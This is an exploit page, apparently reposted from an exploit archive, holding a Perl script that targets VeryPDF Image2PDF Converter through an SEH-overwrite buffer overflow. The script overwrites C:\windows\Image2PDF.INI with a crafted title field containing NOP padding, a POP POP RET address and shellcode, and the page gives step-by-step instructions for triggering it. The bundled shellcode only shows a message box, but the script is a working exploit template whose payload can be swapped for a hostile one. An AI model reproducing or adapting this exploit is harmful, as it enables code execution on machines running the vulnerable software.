Home / os / winmobile

VeryPDF Image2PDF Converter SEH Buffer Overflow

Posted on 10 October 2015

#******************************************************************************************************************************************** # # Exploit Title: VeryPDF Image2PDF Converter SEH Buffer Overflow # Date: 10-7-2015 # Software Link: http://www.verypdf.com/tif2pdf/img2pdf.exe # Exploit Author: Robbie Corley # Platform Tested: Windows 7 x64 # Contact: c0d3rc0rl3y@gmail.com # Website: # CVE: # Category: Local Exploit # # Description: # The title parameter contained within the c:windowsImage2PDF.INI is vulnerable to a buffer overflow. # This can be exploited using SEH overwrite. # # Instructions: # 1. Run this sploit as-is. This will generate the new .ini file and place it in c:windows, overwriting the existing file # 2. Run the Image2PDF program, hit [try], file --> add files # 3. Open any .tif file. Here's the location of one that comes with the installation: C:Program Files (x86)VeryPDF Image2PDF v3.2 rial.tif # 4. Hit 'Make PDF', type in anything for the name of the pdf-to-be, and be greeted with your executed shellcode ;) #********************************************************************************************************************************************** #standard messagebox shellcode. $shellcode = "x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42". "x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03". "x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b". "x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e". "x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c". "x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74". "x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe". "x49x0bx31xc0x51x50xffxd7"; $padding="x90" x 2985; $seh=pack('V',0x6E4B3045); #STANDARD POP POP RET $morepadding="x90" x 1096; open(myfile,'>c:\windows\Image2PDF.INI'); #generate the dummy DWF file #.ini file header & shellcode print myfile "[SaveMode] m_iMakePDFMode=0 m_iSaveMode=0 m_szFilenameORPath= m_iDestinationMode=0 m_bAscFilename=0 m_strFileNumber=0001 [BaseSettingDlg] m_bCheckDespeckle=0 m_bCheckSkewCorrect=0 m_bCheckView=0 m_szDPI=default m_bCheckBWImage=1 [SetPDFInfo] m_szAuthor= m_szSubject= m_szTitle=".$padding."xEBx06x90x90".$seh.$shellcode.$morepadding; close (myfile); #close the file

 

TOP